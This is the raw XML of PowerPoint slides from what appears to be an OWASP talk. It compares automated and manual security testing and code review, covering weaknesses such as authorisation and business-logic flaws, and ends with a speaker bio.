              <a:rPr kumimoji="0" lang="en-IE" sz="1800" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>XSS, SSI, SQLI, Buffer Overflows……</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-IE" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Contextual aspects, critical business focus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Detecting business logic issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>More</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Accurate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" lvl="2" indent="-228600" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Allows for creativity to identify non standard variants (E.g. “Persisted XSS”)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-IE" sz="20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Tx/>
              <a:buSzTx/>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buChar char="4"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="2400" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Bad:</a:t>
            </a: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IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Time limited coverage, variant</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> coverage (attack vectors)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="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IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Tester skill dependant (</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>think</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="1100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> about OWASP ASVS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="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IE" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Can be expensive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="down.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8001000" y="4749800"/>
            <a:ext cx="858837" cy="858837"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="up.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6045200" y="1460500"/>
            <a:ext cx="744537" cy="74453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Lets look at Code review</a:t>
            </a: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15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="http://4.bp.blogspot.com/_keJwBEZPgZE/SdgcWlR7KjI/AAAAAAAAB9A/rwJSK9RE974/s400/OWASP+Code+Review+by+OWASP+Foundation+%28Book%29+in+Computers+%26+Internet.png">
            <a:hlinkClick r:id="rId2"/>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1282700" y="1432409"/>
            <a:ext cx="2565400" cy="370454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Code Review (Static Analysis)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1071562"/>
            <a:ext cx="8229600" cy="5329237"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Automated </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Good:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Generally good (no crawling setbacks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>High accuracy in identifying code violations (not necessarily security violations)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Fast and more cost effective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Bad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Logical Vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Runtime binding/relationships not apparent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Issues are signature based, may not detect many variants</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>External compensating controls not apparent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>High rate of false positives</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Problematic when not all code available</a:t>
            </a:r>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="up.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7154862" y="982662"/>
            <a:ext cx="1285875" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="down.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7154862" y="3243262"/>
            <a:ext cx="1285875" cy="128587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Code Review</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Manual</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Good:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Generally good with technical vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Somewhat limited but better with logical vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Potentially excellent if performed properly, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Can detect  Denial of Service, Privacy &amp; Audit issues</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Can detect potential backdoors, root-kits &amp; malware</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Bad:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Slow and relatively expensive. (Critical apps only?!)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Poorly written code (think sausage) can be difficult to review</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="up.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7154862" y="1274762"/>
            <a:ext cx="1285875" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="down.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7612062" y="3954462"/>
            <a:ext cx="1285875" cy="1285875"/>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Code review</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="944562"/>
            <a:ext cx="8229600" cy="5291137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Key weakness with Automated Code review:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Authorisation logic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Insecure code: No authorisation code = No code [to review]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>No code = tool has no issue to report</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>No issue to report = secure code!! [clean report]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Horizontal Authorisation  (User Authorisation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>A user can not view, manipulate or deny access another user’s [of the same role] data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Vertical Authorisation ( Role Authorisation)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>A user can not perform any action outside their role.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="down.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7637462" y="2316162"/>
            <a:ext cx="1285875" cy="128587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Code review</a:t>
            </a:r>
            <a:endParaRPr lang="en-IE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Business Logic:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Transactions: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Any transactional function which does not require re-authentication is potentially vulnerable to CSRF</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Requires a workflow decision: Tools don’t understand business workflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Mathematical controls:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Negative values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Limits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Conversion rates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Data Transfer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Funds transfer: source and destination accounts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-IE" dirty="0" smtClean="0"/>
              <a:t>Data size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IE" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506637" y="856734"/>
            <a:ext cx="7579319" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buFont typeface="Webdings" pitchFamily="18" charset="2"/>
              <a:buChar char="&lt;"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IE" sz="2800" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
              </a:rPr>
              <a:t>Key weakness with Automated Code review:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="down.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7497762" y="3827462"/>
            <a:ext cx="1285875" cy="12858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IE" dirty="0" smtClean="0"/>
              <a:t>ME</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8195" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="454025" y="1236663"/>
            <a:ext cx="5229225" cy="4801314"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Leader within OWASP since 2002</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IE" dirty="0">
              <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Testing Guide V2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Code Review Guide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Irish chapter founder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IE" dirty="0">
                <a:latin typeface="Arial Black" pitchFamily="34" charset="0"/>
              </a:rPr>
